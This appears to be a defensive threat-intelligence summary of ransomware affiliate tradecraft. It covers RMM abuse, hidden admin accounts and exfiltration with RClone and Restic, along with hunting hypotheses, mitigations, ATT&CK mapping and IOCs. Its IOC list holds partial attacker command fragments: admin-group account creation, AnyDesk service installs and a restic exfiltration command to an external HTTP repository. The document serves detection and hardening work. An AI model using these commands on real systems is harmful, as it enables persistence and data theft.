Beyond the RaaS Headlines: The Reality of Ransomware Tradecraft

What Happened

Ransomware attacks are often carried out by 'affiliates' who rent the ransomware software rather than the creators themselves. This means that the way an attacker breaks into a network can vary wildly even if the final ransomware used is the same. Attackers frequently use legitimate remote access tools, weak passwords, or vulnerable network devices to get inside. Because the methods change so much, it is crucial for organizations to focus on strong security fundamentals like monitoring their networks and reducing exposed systems. Defenders should investigate how the attackers got in, rather than just focusing on the name of the ransomware.

Key Takeaways

• Ransomware brands do not dictate the intrusion chain; affiliates determine the tradecraft, meaning a single ransomware family can be associated with vastly different attack paths.
• Initial access frequently involves abused legitimate tools like RMMs (Bomgar, ScreenConnect, TeamViewer), exposed RDP, or vulnerable edge appliances.
• Persistence is often achieved via rogue RMM installations (AnyDesk, Chrome Remote Desktop) and hidden local user accounts.
• Data staging and exfiltration leverage tools like 7-Zip, RClone, S5cmd, Restic, and LOLBins like finger.exe.
• Defenders must investigate the full intrusion path rather than making assumptions based on the ransomware payload's branding.

Affected Systems

• Windows
• SonicWall VPNs
• Remote Desktop Protocol (RDP)
• Microsoft SQL Server (MSSQL)

Attack Chain

Threat actors gain initial access via exposed RDP, vulnerable edge appliances (like SonicWall VPNs), or compromised RMM tools (such as Bomgar). Once inside, they establish persistence by creating hidden local user accounts and installing additional remote access tools like AnyDesk or Chrome Remote Desktop. The attackers then evade defenses using EDR/AV killers or BYOVD techniques before staging data with archiving tools like 7-Zip. Finally, data is exfiltrated using LOLBins, backup utilities like Restic, or cloud sync tools before the ransomware payload is deployed.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide specific detection rules, but outlines behavioral patterns and command-line fragments observed in Huntress telemetry.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions are highly effective at capturing process creation events, command-line arguments (like those used for 7-Zip, Restic, and net.exe), and the installation of new services for RMM tools. Network Visibility: Medium — While network monitoring can detect large outbound data transfers to cloud storage or unusual RDP/VPN traffic, the use of encrypted channels and legitimate services (like MEGASync or AnyDesk) can blend in with normal traffic. Detection Difficulty: Moderate — Detecting these intrusions requires distinguishing between legitimate administrative use of RMMs/backup tools and malicious abuse, which relies heavily on behavioral context and anomaly detection.

Required Log Sources

• Process Creation (Event ID 4688)
• Sysmon Event ID 1 (Process creation)
• Service Creation (Event ID 7045)
• Local Group Membership (Event ID 4732)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Consider hunting for unexpected execution of portable archiving tools (like 7zG.exe) from user profile directories such as Downloads or Temp.	Process Creation	Collection	Low to Medium
Evaluate whether local administrator accounts are being created by unusual parent processes or outside of standard provisioning windows.	Security Event Logs (Event ID 4732)	Persistence	Low
If you have visibility into service creation, consider hunting for the unexpected installation of RMM tools like AnyDesk or Chrome Remote Desktop on critical servers.	System Event Logs (Event ID 7045)	Persistence	Medium
Consider hunting for the use of backup utilities like Restic or open-source tools like RClone executing with command-line arguments pointing to external or untrusted IP addresses.	Process Creation	Exfiltration	Medium

Control Gaps

• Lack of strict application control allowing portable executables to run from user directories
• Insufficient monitoring of legitimate RMM tool usage
• Inadequate network segmentation allowing lateral movement via RDP

Key Behavioral Indicators

• Execution of bomgar-scc.exe spawning cmd.exe and net.exe
• AnyDesk.exe running with --control or --service flags
• remoting_host.exe running with --type=daemon
• restic.exe executing with --password-file and external HTTP destinations

False Positive Assessment

• Medium. The threat actors heavily rely on Living-off-the-Land binaries (LOLBins) and legitimate administrative tools (RMMs, backup utilities, 7-Zip). Alerting purely on the presence of these tools without behavioral context will generate false positives in environments where they are used legitimately.

Recommendations

Immediate Mitigation

• Verify against your organization's incident response runbook and team escalation paths before acting.
• Consider auditing all installed Remote Monitoring and Management (RMM) tools and removing unauthorized instances like AnyDesk or Chrome Remote Desktop.
• Evaluate whether exposed RDP services can be disabled or placed behind a VPN with MFA enforced.

Infrastructure Hardening

• Consider implementing strict application control policies to prevent the execution of portable utilities (e.g., 7-Zip Portable, RClone) from user directories.
• Evaluate network segmentation strategies to limit lateral movement via SMB and RDP.
• If applicable, ensure all edge appliances (like SonicWall VPNs) are patched to the latest firmware versions to prevent exploitation.

User Protection

• Consider enforcing multi-factor authentication (MFA) for all remote access and VPN solutions.
• Evaluate whether local administrator privileges can be restricted for standard users to prevent unauthorized account creation.

Security Awareness

• Consider training help-desk staff on social engineering and vishing tactics frequently used by affiliates like Scattered Spider.
• Evaluate incorporating RMM abuse scenarios into tabletop exercises and security awareness programs.

MITRE ATT&CK Mapping

• T1133 - External Remote Services
• T1190 - Exploit Public-Facing Application
• T1078 - Valid Accounts
• T1136.001 - Create Account: Local Account
• T1219 - Remote Access Software
• T1562.001 - Impair Defenses: Disable or Modify Tools
• T1560.001 - Archive Collected Data: Archive via Utility
• T1048 - Exfiltration Over Alternative Protocol
• T1486 - Data Encrypted for Impact

Additional IOCs

• File Paths:
  • C:\Program Files (x86)\AnyDesk\AnyDesk.exe - Legitimate AnyDesk executable path abused for persistence
  • C:\Program Files (x86)\Google\Chrome Remote Desktop\147.0.7727.3\remoting_host.exe - Legitimate Chrome Remote Desktop executable path abused for persistence
• Command Lines:
  • Purpose: Local administrator account creation for persistence | Tools: net.exe, cmd.exe | Stage: Persistence | net localgroup administrators
  • Purpose: AnyDesk execution for remote access and persistence | Tools: AnyDesk.exe | Stage: Persistence | AnyDesk.exe --control
  • Purpose: AnyDesk service installation for persistence | Tools: AnyDesk.exe | Stage: Persistence | AnyDesk.exe --service
  • Purpose: Chrome Remote Desktop execution as a daemon for persistence | Tools: remoting_host.exe | Stage: Persistence | remoting_host.exe" --type=daemon --host-config=
  • Purpose: Data staging and compression using portable 7-Zip | Tools: 7zG.exe | Stage: Collection | 7zG.exe" a -i#
  • Purpose: Data exfiltration using Restic backup utility | Tools: restic.exe | Stage: Exfiltration | restic.exe -r rest:http://